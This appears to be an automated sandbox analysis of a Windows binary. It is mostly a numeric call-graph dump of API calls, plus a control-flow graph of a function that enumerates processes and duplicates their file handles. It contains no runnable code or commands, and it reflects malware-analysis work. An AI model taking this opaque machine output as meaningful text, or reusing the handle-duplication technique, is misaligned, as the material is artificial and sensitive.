39363->39365 39367 443d90 110 API calls 39363->39367 39471 415258 39364->39471 39365->39307 39365->39334 39367->39365 39368 444524 39369 444541 39368->39369 39370 44452a 39368->39370 39474 444316 39369->39474 39508 416935 39370->39508 39374 444316 18 API calls 39375 444563 39374->39375 39376 444316 18 API calls 39375->39376 39377 44456f 39376->39377 39378 444316 18 API calls 39377->39378 39379 44457f 39378->39379 39379->39402 39488 432d4e 39379->39488 39382 444316 18 API calls 39383 4445b0 39382->39383 39492 41eed2 39383->39492 39521 4442e6 11 API calls 39402->39521 39522 438460 39403->39522 39405 409240 39405->39311 39406 4251c4 39405->39406 39534 424f07 39406->39534 39408 
4251e4 39409 4251f7 39408->39409 39410 4251e8 39408->39410 39542 4250f8 39409->39542 39541 4446ea 11 API calls 39410->39541 39412 4251f2 39412->39314 39414 425209 39417 425249 39414->39417 39420 4250f8 126 API calls 39414->39420 39421 425287 39414->39421 39550 4384e9 134 API calls 39414->39550 39551 424f74 123 API calls 39414->39551 39417->39421 39552 424ff0 13 API calls 39417->39552 39420->39414 39554 415c7d 16 API calls 39421->39554 39422 425266 39422->39421 39553 415be9 memcpy 39422->39553 39424->39320 39425->39325 39428->39311 39429->39344 39430->39347 39431->39321 39433 443da3 39432->39433 39451 443db6 39432->39451 39555 41707a 39433->39555 39435 443da8 39436 443dac 39435->39436 39438 443dbc 39435->39438 39568 4446ea 11 API calls 39436->39568 39560 4300e8 39438->39560 39451->39326 39452->39334 39454 4438d0 39453->39454 39460 4438c9 39453->39460 39455 415378 memcpy memcpy 39454->39455 39456 4438d5 39455->39456 39457 4154e2 10 API calls 39456->39457 39458 443906 39456->39458 39456->39460 39457->39458 39459 443970 memset 39458->39459 39458->39460 39462 44398b 39459->39462 39460->39359 39461 415700 10 API calls 39464 4439c0 39461->39464 39463 41975c 10 API calls 39462->39463 39465 4439a0 39462->39465 39463->39465 39464->39460 39466 418981 10 API calls 39464->39466 39465->39460 39465->39461 39466->39460 39468 415a77 39467->39468 39469 415a8d 39468->39469 39470 415a7e memset 39468->39470 39469->39362 39470->39469 39472 4438b5 11 API calls 39471->39472 39473 41525d 39472->39473 39473->39368 39475 444328 39474->39475 39476 444423 39475->39476 39477 44434e 39475->39477 39478 4446ea 11 API calls 39476->39478 39479 432d4e memset memset memcpy 39477->39479 39485 444381 39478->39485 39480 44435a 39479->39480 39482 444375 39480->39482 39487 44438b 39480->39487 39481 432d4e memset memset memcpy 39483 4443ec 39481->39483 39484 416935 16 API calls 39482->39484 39483->39485 39486 416935 16 API calls 39483->39486 39484->39485 39485->39374 39486->39485 39487->39481 39489 432d58 
39488->39489 39491 432d65 39488->39491 39490 432cc4 memset memset memcpy 39489->39490 39490->39491 39491->39382 39509 41693e 39508->39509 39512 41698e 39508->39512 39510 41694c 39509->39510 39511 422fd1 memset 39509->39511 39510->39512 39513 4165a0 11 API calls 39510->39513 39511->39510 39512->39402 39514 416972 39513->39514 39514->39512 39515 422b84 15 API calls 39514->39515 39515->39512 39521->39363 39523 41703f 11 API calls 39522->39523 39524 43847a 39523->39524 39525 43848a 39524->39525 39526 43847e 39524->39526 39528 438270 133 API calls 39525->39528 39527 4446ea 11 API calls 39526->39527 39530 438488 39527->39530 39529 4384aa 39528->39529 39529->39530 39531 424f26 122 API calls 39529->39531 39530->39405 39532 4384bb 39531->39532 39533 438270 133 API calls 39532->39533 39533->39530 39535 424f1f 39534->39535 39536 424f0c 39534->39536 39538 424eea 11 API calls 39535->39538 39537 416760 11 API calls 39536->39537 39539 424f18 39537->39539 39540 424f24 39538->39540 39539->39408 39540->39408 39541->39412 39543 425108 39542->39543 39549 42510d 39542->39549 39544 424f74 123 API calls 39543->39544 39544->39549 39545 42569b 124 API calls 39546 42516e 39545->39546 39548 415c7d 16 API calls 39546->39548 39547 425115 39547->39414 39548->39547 39549->39545 39549->39547 39550->39414 39551->39414 39552->39422 39553->39421 39554->39412 39556 417085 39555->39556 39557 4170ab 39555->39557 39556->39557 39558 416760 11 API calls 39556->39558 39557->39435 39559 4170a4 39558->39559 39559->39435 39561 430128 39560->39561 39564 4300fa 39560->39564 39563 430196 memset 39561->39563 39562 432f8c memset 39562->39564 39567 4301de 39563->39567 39564->39561 39564->39562 39564->39567 39568->39451 39598 413f4f 39571->39598 39574 413f37 K32GetModuleFileNameExW 39575 413f4a 39574->39575 39575->38708 39577 41396c wcschr 39576->39577 39579 413969 wcscpy 39576->39579 39577->39579 39580 41398e 39577->39580 39581 413a3a 39579->39581 39603 4097f7 wcslen wcslen _memicmp 39580->39603 39581->38708 39583 
41399a 39584 4139a4 memset 39583->39584 39585 4139e6 39583->39585 39604 409dd5 GetWindowsDirectoryW wcscpy 39584->39604 39587 413a31 wcscpy 39585->39587 39588 4139ec memset 39585->39588 39587->39581 39605 409dd5 GetWindowsDirectoryW wcscpy 39588->39605 39589 4139c9 wcscpy wcscat 39589->39581 39591 413a11 memcpy wcscat 39591->39581 39593 413cb0 GetModuleHandleW 39592->39593 39594 413cda 39592->39594 39593->39594 39595 413cbf GetProcAddress 39593->39595 39596 413ce3 GetProcessTimes 39594->39596 39597 413cf6 39594->39597 39595->39594 39596->38710 39597->38710 39599 413f2f 39598->39599 39600 413f54 39598->39600 39599->39574 39599->39575 39601 40a804 8 API calls 39600->39601 39602 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39601->39602 39602->39599 39603->39583 39604->39589 39605->39591 39606->38731 39607->38753 39609 409cf9 GetVersionExW 39608->39609 39610 409d0a 39608->39610 39609->39610 39610->38760 39610->38763 39611->38767 39612->38769 39613->38835 39615 40bba5 39614->39615 39662 40cc26 39615->39662 39618 40bd4b 39683 40cc0c 39618->39683 39623 40b2cc 27 API calls 39624 40bbef 39623->39624 39690 40ccf0 _wcsicmp 39624->39690 39626 40bbf5 39626->39618 39691 40ccb4 6 API calls 39626->39691 39628 40bc26 39629 40cf04 17 API calls 39628->39629 39630 40bc2e 39629->39630 39631 40bd43 39630->39631 39632 40b2cc 27 API calls 39630->39632 39633 40cc0c 4 API calls 39631->39633 39634 40bc40 39632->39634 39633->39618 39692 40ccf0 _wcsicmp 39634->39692 39636 40bc46 39636->39631 39637 40bc61 memset memset WideCharToMultiByte 39636->39637 39693 40103c strlen 39637->39693 39639 40bcc0 39640 40b273 27 API calls 39639->39640 39641 40bcd0 memcmp 39640->39641 39641->39631 39642 40bce2 39641->39642 39643 404423 37 API calls 39642->39643 39644 40bd10 39643->39644 39644->39631 39645 40bd3a LocalFree 39644->39645 39646 40bd1f memcpy 39644->39646 39645->39631 39646->39645 39647->38850 39649 409a74 GetTempFileNameW 39648->39649 39650 409a66 
GetWindowsDirectoryW 39648->39650 39649->38848 39650->39649 39651->38885 39652->38885 39653->38885 39654->38885 39655->38885 39656->38885 39657->38885 39658->38885 39659->38885 39660->38860 39661->38882 39694 4096c3 CreateFileW 39662->39694 39664 40cc34 39665 40cc3d GetFileSize 39664->39665 39666 40bbca 39664->39666 39667 40afcf 2 API calls 39665->39667 39666->39618 39674 40cf04 39666->39674 39668 40cc64 39667->39668 39695 40a2ef ReadFile 39668->39695 39670 40cc71 39696 40ab4a MultiByteToWideChar 39670->39696 39672 40cc95 CloseHandle 39673 40b04b ??3@YAXPAX 39672->39673 39673->39666 39675 40b633 free 39674->39675 39676 40cf14 39675->39676 39702 40b1ab free free 39676->39702 39678 40bbdd 39678->39618 39678->39623 39679 40cf1b 39679->39678 39681 40cfef 39679->39681 39703 40cd4b 39679->39703 39682 40cd4b 14 API calls 39681->39682 39682->39678 39684 40b633 free 39683->39684 39685 40cc15 39684->39685 39686 40aa04 free 39685->39686 39687 40cc1d 39686->39687 39752 40b1ab free free 39687->39752 39689 40b7d4 memset CreateFileW 39689->38841 39689->38842 39690->39626 39691->39628 39692->39636 39693->39639 39694->39664 39695->39670 39697 40ab6b 39696->39697 39701 40ab93 39696->39701 39698 40a9ce 4 API calls 39697->39698 39699 40ab74 39698->39699 39700 40ab7c MultiByteToWideChar 39699->39700 39700->39701 39701->39672 39702->39679 39704 40cd7b 39703->39704 39737 40aa29 39704->39737 39706 40cef5 39707 40aa04 free 39706->39707 39708 40cefd 39707->39708 39708->39679 39710 40aa29 6 API calls 39711 40ce1d 39710->39711 39712 40aa29 6 API calls 39711->39712 39713 40ce3e 39712->39713 39714 40ce6a 39713->39714 39745 40abb7 wcslen memmove 39713->39745 39715 40ce9f 39714->39715 39748 40abb7 wcslen memmove 39714->39748 39718 40a8d0 7 API calls 39715->39718 39721 40ceb5 39718->39721 39719 40ce56 39746 40aa71 wcslen 39719->39746 39720 40ce8b 39749 40aa71 wcslen 39720->39749 39727 40a8d0 7 API calls 39721->39727 39724 40ce5e 39747 40abb7 wcslen memmove 39724->39747 39725 40ce93 39750 40abb7 
wcslen memmove 39725->39750 39729 40cecb 39727->39729 39751 40d00b malloc memcpy free free 39729->39751 39731 40cedd 39732 40aa04 free 39731->39732 39733 40cee5 39732->39733 39734 40aa04 free 39733->39734 39735 40ceed 39734->39735 39736 40aa04 free 39735->39736 39736->39706 39738 40aa33 39737->39738 39744 40aa63 39737->39744 39739 40aa44 39738->39739 39740 40aa38 wcslen 39738->39740 39741 40a9ce malloc memcpy free free 39739->39741 39740->39739 39742 40aa4d 39741->39742 39743 40aa51 memcpy 39742->39743 39742->39744 39743->39744 39744->39706 39744->39710 39745->39719 39746->39724 39747->39714 39748->39720 39749->39725 39750->39715 39751->39731 39752->39689 39753->38900 39754->38908 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39764 4148b6 FindResourceW 39765 4148cf SizeofResource 39764->39765 39768 4148f9 39764->39768 39766 4148e0 LoadResource 39765->39766 39765->39768 39767 4148ee LockResource 39766->39767 39766->39768 39767->39768 37851 415304 free 39769 441b3f 39779 43a9f6 39769->39779 39771 441b61 39952 4386af memset 39771->39952 39773 44189a 39774 4418e2 39773->39774 39776 442bd4 39773->39776 39775 4418ea 39774->39775 39953 4414a9 12 API calls 39774->39953 39776->39775 39954 441409 memset 39776->39954 39780 43aa20 39779->39780 39781 43aadf 39779->39781 39780->39781 39782 43aa34 memset 39780->39782 39781->39771 39783 43aa56 39782->39783 39784 43aa4d 39782->39784 39955 43a6e7 39783->39955 39963 42c02e memset 39784->39963 39789 43aad3 39965 4169a7 11 API calls 39789->39965 39790 43aaae 39790->39781 39790->39789 39805 43aae5 39790->39805 39791 43ac18 39794 43ac47 39791->39794 39967 42bbd5 memcpy memcpy memcpy memset memcpy 39791->39967 39795 43aca8 39794->39795 39968 438eed 16 API calls 39794->39968 39798 43acd5 39795->39798 39970 4233ae 11 API calls 39795->39970 39971 423426 11 API calls 39798->39971 39799 43ac87 39969 4233c5 16 API calls 39799->39969 39803 43ace1 39972 439811 162 API calls 39803->39972 39804 43a9f6 160 
API calls 39804->39805 39805->39781 39805->39791 39805->39804 39966 439bbb 22 API calls 39805->39966 39807 43acfd 39812 43ad2c 39807->39812 39973 438eed 16 API calls 39807->39973 39809 43ad19 39974 4233c5 16 API calls 39809->39974 39810 43ad58 39975 44081d 162 API calls 39810->39975 39812->39810 39816 43add9 39812->39816 39815 43ae3a memset 39817 43ae73 39815->39817 39816->39816 39979 423426 11 API calls 39816->39979 39980 42e1c0 146 API calls 39817->39980 39818 43adab 39977 438c4e 162 API calls 39818->39977 39821 43ad6c 39821->39781 39821->39818 39976 42370b memset memcpy memset 39821->39976 39823 43adcc 39978 440f84 12 API calls 39823->39978 39824 43ae96 39981 42e1c0 146 API calls 39824->39981 39827 43aea8 39828 43aec1 39827->39828 39982 42e199 146 API calls 39827->39982 39829 43af00 39828->39829 39983 42e1c0 146 API calls 39828->39983 39829->39781 39833 43af1a 39829->39833 39834 43b3d9 39829->39834 39984 438eed 16 API calls 39833->39984 39840 43b3f6 39834->39840 39842 43b4c8 39834->39842 39836 43b60f 39836->39781 40043 4393a5 17 API calls 39836->40043 39838 43af2f 39985 4233c5 16 API calls 39838->39985 40025 432878 12 API calls 39840->40025 39841 43af51 39986 423426 11 API calls 39841->39986 39844 43b4f2 39842->39844 40031 42bbd5 memcpy memcpy memcpy memset memcpy 39842->40031 40032 43a76c 21 API calls 39844->40032 39846 43af7d 39987 423426 11 API calls 39846->39987 39850 43b529 40033 44081d 162 API calls 39850->40033 39851 43b462 40027 423330 11 API calls 39851->40027 39852 43af94 39988 423330 11 API calls 39852->39988 39856 43afca 39989 423330 11 API calls 39856->39989 39857 43b47e 39861 43b497 39857->39861 40028 42374a memcpy memset memcpy memcpy memcpy 39857->40028 39858 43b544 39862 43b55c 39858->39862 40034 42c02e memset 39858->40034 39859 43b428 39859->39851 40026 432b60 16 API calls 39859->40026 40029 4233ae 11 API calls 39861->40029 40035 43a87a 162 API calls 39862->40035 39863 43afdb 39990 4233ae 11 API calls 39863->39990 39869 43b56c 39872 43b58a 
39869->39872 40036 423330 11 API calls 39869->40036 39870 43b4b1 40030 423399 11 API calls 39870->40030 39871 43afee 39991 44081d 162 API calls 39871->39991 40037 440f84 12 API calls 39872->40037 39874 43b4c1 40039 42db80 162 API calls 39874->40039 39879 43b592 40038 43a82f 16 API calls 39879->40038 39882 43b5b4 40040 438c4e 162 API calls 39882->40040 39884 43b5cf 40041 42c02e memset 39884->40041 39886 43b005 39886->39781 39890 43b01f 39886->39890 39992 42d836 162 API calls 39886->39992 39887 43b1ef 40002 4233c5 16 API calls 39887->40002 39890->39887 40000 423330 11 API calls 39890->40000 40001 42d71d 162 API calls 39890->40001 39891 43b212 40003 423330 11 API calls 39891->40003 39892 43b087 39993 4233ae 11 API calls 39892->39993 39893 43add4 39893->39836 40042 438f86 16 API calls 39893->40042 39897 43b22a 40004 42ccb5 11 API calls 39897->40004 39900 43b23f 40005 4233ae 11 API calls 39900->40005 39901 43b10f 39996 423330 11 API calls 39901->39996 39903 43b257 40006 4233ae 11 API calls 39903->40006 39907 43b129 39997 4233ae 11 API calls 39907->39997 39908 43b26e 40007 4233ae 11 API calls 39908->40007 39911 43b09a 39911->39901 39994 42cc15 19 API calls 39911->39994 39995 4233ae 11 API calls 39911->39995 39912 43b282 40008 43a87a 162 API calls 39912->40008 39914 43b13c 39998 440f84 12 API calls 39914->39998 39916 43b29d 40009 423330 11 API calls 39916->40009 39919 43b15f 39999 4233ae 11 API calls 39919->39999 39920 43b2af 39922 43b2b8 39920->39922 39923 43b2ce 39920->39923 40010 4233ae 11 API calls 39922->40010 40011 440f84 12 API calls 39923->40011 39926 43b2c9 40013 4233ae 11 API calls 39926->40013 39927 43b2da 40012 42370b memset memcpy memset 39927->40012 39930 43b2f9 40014 423330 11 API calls 39930->40014 39932 43b30b 40015 423330 11 API calls 39932->40015 39934 43b325 40016 423399 11 API calls 39934->40016 39936 43b332 40017 4233ae 11 API calls 39936->40017 39938 43b354 40018 423399 11 API calls 39938->40018 39940 43b364 40019 43a82f 16 API calls 39940->40019 
39942 43b370 40020 42db80 162 API calls 39942->40020 39944 43b380 40021 438c4e 162 API calls 39944->40021 39946 43b39e 40022 423399 11 API calls 39946->40022 39948 43b3ae 40023 43a76c 21 API calls 39948->40023 39950 43b3c3 40024 423399 11 API calls 39950->40024 39952->39773 39953->39775 39954->39776 39956 43a6f5 39955->39956 39957 43a765 39955->39957 39956->39957 40044 42a115 39956->40044 39957->39781 39964 4397fd memset 39957->39964 39961 43a73d 39961->39957 39962 42a115 146 API calls 39961->39962 39962->39957 39963->39783 39964->39790 39965->39781 39966->39805 39967->39794 39968->39799 39969->39795 39970->39798 39971->39803 39972->39807 39973->39809 39974->39812 39975->39821 39976->39818 39977->39823 39978->39893 39979->39815 39980->39824 39981->39827 39982->39828 39983->39828 39984->39838 39985->39841 39986->39846 39987->39852 39988->39856 39989->39863 39990->39871 39991->39886 39992->39892 39993->39911 39994->39911 39995->39911 39996->39907 39997->39914 39998->39919 39999->39890 40000->39890 40001->39890 40002->39891 40003->39897 40004->39900 40005->39903 40006->39908 40007->39912 40008->39916 40009->39920 40010->39926 40011->39927 40012->39926 40013->39930 40014->39932 40015->39934 40016->39936 40017->39938 40018->39940 40019->39942 40020->39944 40021->39946 40022->39948 40023->39950 40024->39893 40025->39859 40026->39851 40027->39857 40028->39861 40029->39870 40030->39874 40031->39844 40032->39850 40033->39858 40034->39862 40035->39869 40036->39872 40037->39879 40038->39874 40039->39882 40040->39884 40041->39893 40042->39836 40043->39781 40045 42a175 40044->40045 40047 42a122 40044->40047 40045->39957 40050 42b13b 146 API calls 40045->40050 40047->40045 40048 42a115 146 API calls 40047->40048 40051 43a174 40047->40051 40075 42a0a8 146 API calls 40047->40075 40048->40047 40050->39961 40065 43a196 40051->40065 40066 43a19e 40051->40066 40052 43a306 40052->40065 40095 4388c4 14 API calls 40052->40095 40055 42a115 146 API calls 40055->40066 40057 43a642 
40057->40065 40099 4169a7 11 API calls 40057->40099 40061 43a635 40098 42c02e memset 40061->40098 40065->40047 40066->40052 40066->40055 40066->40065 40076 42ff8c 40066->40076 40084 415a91 40066->40084 40088 4165ff 40066->40088 40091 439504 13 API calls 40066->40091 40092 4312d0 146 API calls 40066->40092 40093 42be4c memcpy memcpy memcpy memset memcpy 40066->40093 40094 43a121 11 API calls 40066->40094 40068 42bf4c 14 API calls 40070 43a325 40068->40070 40069 4169a7 11 API calls 40069->40070 40070->40057 40070->40061 40070->40065 40070->40068 40070->40069 40071 42b5b5 memset memcpy 40070->40071 40074 4165ff 11 API calls 40070->40074 40096 42b63e 14 API calls 40070->40096 40097 42bfcf memcpy 40070->40097 40071->40070 40074->40070 40075->40047 40100 43817e 40076->40100 40078 42ff9d 40078->40066 40079 42ff99 40079->40078 40080 42ffe3 40079->40080 40081 42ffd0 40079->40081 40105 4169a7 11 API calls 40080->40105 40104 4169a7 11 API calls 40081->40104 40085 415a9d 40084->40085 40086 415ab3 40085->40086 40087 415aa4 memset 40085->40087 40086->40066 40087->40086 40254 4165a0 40088->40254 40091->40066 40092->40066 40093->40066 40094->40066 40095->40070 40096->40070 40097->40070 40098->40057 40099->40065 40101 438187 40100->40101 40103 438192 40100->40103 40106 4380f6 40101->40106 40103->40079 40104->40078 40105->40078 40108 43811f 40106->40108 40107 438164 40107->40103 40108->40107 40110 4300e8 3 API calls 40108->40110 40111 437e5e 40108->40111 40110->40108 40134 437d3c 40111->40134 40113 437eb3 40113->40108 40114 437ea9 40114->40113 40120 437f22 40114->40120 40149 41f432 40114->40149 40117 437f06 40196 415c56 11 API calls 40117->40196 40118 437f7f 40121 437f95 40118->40121 40124 43802b 40118->40124 40120->40118 40122 432d4e 3 API calls 40120->40122 40197 415c56 11 API calls 40121->40197 40122->40118 40125 4165ff 11 API calls 40124->40125 40126 438054 40125->40126 40160 437371 40126->40160 40129 43806b 40130 438094 40129->40130 40198 42f50e 137 API calls 40129->40198 40132 
437fa3 40130->40132 40133 4300e8 3 API calls 40130->40133 40132->40113 40199 41f638 103 API calls 40132->40199 40133->40132 40135 437d69 40134->40135 40138 437d80 40134->40138 40200 437ccb 11 API calls 40135->40200 40137 437d76 40137->40114 40138->40137 40139 437da3 40138->40139 40140 437d90 40138->40140 40142 438460 133 API calls 40139->40142 40140->40137 40204 437ccb 11 API calls 40140->40204 40145 437dcb 40142->40145 40143 437de8 40203 424f26 122 API calls 40143->40203 40145->40143 40201 444283 13 API calls 40145->40201 40147 437dfc 40202 437ccb 11 API calls 40147->40202 40150 41f54d 40149->40150 40156 41f44f 40149->40156 40151 41f466 40150->40151 40234 41c635 memset memset 40150->40234 40151->40117 40151->40120 40156->40151 40158 41f50b 40156->40158 40205 41f1a5 40156->40205 40230 41c06f memcmp 40156->40230 40231 41f3b1 89 API calls 40156->40231 40232 41f398 85 API calls 40156->40232 40158->40150 40158->40151 40233 41c295 85 API calls 40158->40233 40235 41703f 40160->40235 40162 437399 40163 43739d 40162->40163 40165 4373ac 40162->40165 40242 4446ea 11 API calls 40163->40242 40166 416935 16 API calls 40165->40166 40167 4373ca 40166->40167 40169 438460 133 API calls 40167->40169 40173 4251c4 136 API calls 40167->40173 40177 415a91 memset 40167->40177 40180 43758f 40167->40180 40192 437584 40167->40192 40195 437d3c 134 API calls 40167->40195 40243 425433 13 API calls 40167->40243 40244 425413 17 API calls 40167->40244 40245 42533e 16 API calls 40167->40245 40246 42538f 16 API calls 40167->40246 40247 42453e 122 API calls 40167->40247 40168 4375bc 40250 415c7d 16 API calls 40168->40250 40169->40167 40172 4375d2 40194 4373a7 40172->40194 40251 4442e6 11 API calls 40172->40251 40173->40167 40175 4375e2 40175->40194 40252 444283 13 API calls 40175->40252 40177->40167 40248 42453e 122 API calls 40180->40248 40181 4375f4 40186 437620 40181->40186 40187 43760b 40181->40187 40185 43759f 40188 416935 16 API calls 40185->40188 40190 416935 16 API calls 40186->40190 40253 
444283 13 API calls 40187->40253 40188->40192 40190->40194 40192->40168 40249 42453e 122 API calls 40192->40249 40193 437612 memcpy 40193->40194 40194->40129 40195->40167 40196->40113 40197->40132 40198->40130 40199->40113 40200->40137 40201->40147 40202->40143 40203->40137 40204->40137 40206 41bc3b 100 API calls 40205->40206 40207 41f1b4 40206->40207 40208 41edad 85 API calls 40207->40208 40215 41f282 40207->40215 40209 41f1cb 40208->40209 40210 41f1f5 memcmp 40209->40210 40211 41f20e 40209->40211 40209->40215 40210->40211 40212 41f21b memcmp 40211->40212 40211->40215 40213 41f326 40212->40213 40216 41f23d 40212->40216 40214 41ee6b 85 API calls 40213->40214 40213->40215 40214->40215 40215->40156 40216->40213 40217 41f28e memcmp 40216->40217 40219 41c8df 55 API calls 40216->40219 40217->40213 40218 41f2a9 40217->40218 40218->40213 40221 41f308 40218->40221 40222 41f2d8 40218->40222 40220 41f269 40219->40220 40220->40213 40223 41f287 40220->40223 40224 41f27a 40220->40224 40221->40213 40228 4446ce 11 API calls 40221->40228 40225 41ee6b 85 API calls 40222->40225 40223->40217 40226 41ee6b 85 API calls 40224->40226 40227 41f2e0 40225->40227 40226->40215 40229 41b1ca memset 40227->40229 40228->40213 40229->40215 40230->40156 40231->40156 40232->40156 40233->40150 40234->40151 40236 417044 40235->40236 40237 41705c 40235->40237 40239 416760 11 API calls 40236->40239 40241 417055 40236->40241 40238 417075 40237->40238 40240 41707a 11 API calls 40237->40240 40238->40162 40239->40241 40240->40236 40241->40162 40242->40194 40243->40167 40244->40167 40245->40167 40246->40167 40247->40167 40248->40185 40249->40168 40250->40172 40251->40175 40252->40181 40253->40193 40259 415cfe 40254->40259 40263 415d23 __aullrem __aulldvrm 40259->40263 40266 41628e 40259->40266 40260 4163ca 40273 416422 11 API calls 40260->40273 40262 416172 memset 40262->40263 40263->40260 40263->40262 40264 416422 10 API calls 40263->40264 40265 415cb9 10 API calls 40263->40265 40263->40266 40264->40263 
40265->40263 40267 416520 40266->40267 40268 416527 40267->40268 40272 416574 40267->40272 40270 416544 40268->40270 40268->40272 40274 4156aa 11 API calls 40268->40274 40271 416561 memcpy 40270->40271 40270->40272 40271->40272 40272->40066 40273->40266 40274->40270 40296 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 
37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 
37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 357 40de74-40de78 356->357 358 40de65-40de6c 356->358 357->352 357->356 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 377 40dffd-40e006 372->377 375 40df08 373->375 376 40dfef-40dff2 CloseHandle 373->376 374->370 374->377 378 40df0b-40df10 375->378 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->376 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
